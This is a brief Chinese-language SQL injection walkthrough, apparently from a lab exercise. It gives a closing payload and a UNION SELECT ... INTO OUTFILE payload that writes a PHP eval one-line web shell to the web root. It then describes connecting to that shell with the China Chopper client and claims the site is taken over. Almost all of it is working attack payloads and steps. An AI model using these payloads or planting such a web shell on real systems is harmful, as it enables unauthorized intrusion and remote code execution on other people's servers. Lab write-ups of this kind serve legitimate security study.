由于没有回显且作者希望我们使用outfile所以我们使用mysql中的
select into outfile语句将结果输出到指定的文件中
?id=1'))--+
构造闭合
?id=1')) union all select 1,2,'<?php @eval($_POST["xxx"]);?>' into outfile '/var/www/sql/123.txt' --+
然后登陆中国菜刀
地址为http://192.168.1.1/sql/123.txt
口令为xxx
类型为php(eval)
拿站成功!